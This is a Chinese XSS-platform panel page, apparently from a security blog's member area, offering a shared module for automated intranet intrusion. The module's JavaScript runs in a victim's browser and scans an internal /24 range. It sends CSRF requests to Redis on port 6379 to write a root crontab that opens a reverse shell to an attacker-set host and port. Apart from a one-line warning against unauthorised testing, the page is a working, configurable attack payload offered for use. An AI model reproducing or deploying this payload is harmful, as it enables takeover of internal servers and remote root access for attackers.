存档
那些文章
漏洞预警
圈内新闻
资源分享
设计笔记
吐槽
笔记
关于
留言
友链
计划
读者墙
标签集
面板
更新历史
提交需求
Chatgpt
XSS平台
子站搜索
会员面板
请经常阅读公告和更新日志来快速了解面板的发展情况.
未登录
未激活
面板公告
更新历史
提交需求
需求列表
Chatgpt
XSS 平台
我的模块
公共模块
辅助扩展
短号选择
子站搜索
面板密语
个人设置
消费清单
退出登录
测试之前,请妥善考虑一二,请勿胡乱搞事情,测试未授权网站有风险!
模块名称
xss+csrf+redis自动化入侵内网
模块描述
在http://替换成你的域名/xss.php?do=module&act=set&id=20基础下改进,批量操作内网redis 参数说明: ip:你要打的内网ip段,填10.10.2.1 则打内网的10.10.2.1-10.10.2.255 lhost:你的服务器,用nc监听的ip lport:nc监听的端口
参数
需要服务器接收的参数名
没有配置该参数!
配置参数
使用此模块时需要配置的参数,如参数名为user,则代码引用:{set.user}
["ip","lhost","lport"]
代码
{projectId}为项目id,{set.***}为***配置参数
var ip = '{set.ip}'; var iparr = arr = ip.split("."); for(var i=0;i<255;i++) { var attkip = iparr [0] + "." + iparr [1] + "." + iparr [2] + "." + i; send(attkip); } function send(ip) { var port= '6379'; var dir = '/var/spool/cron/'; var filename = 'root'; var content = '*/1 * * * * /bin/bash -i >& /dev/tcp/{set.lhost}/{set.lport} 0>&1'; var url = "http://" + ip + ":" + port; var cmd = new XMLHttpRequest(); cmd.open("POST", url); cmd.send('eval '' + 'redis.call("set", "hacked", "\r\n\n'+content+'\n\n\n\n\"); redis.call("config", "set", "dir", "' + dir + '/"); redis.call("config", "set", "dbfilename", "'+filename+'"); ' + '' 0' + "\r\n"); var cmd = new XMLHttpRequest(); cmd.open("POST", url); cmd.send('save\r\n'); }
返回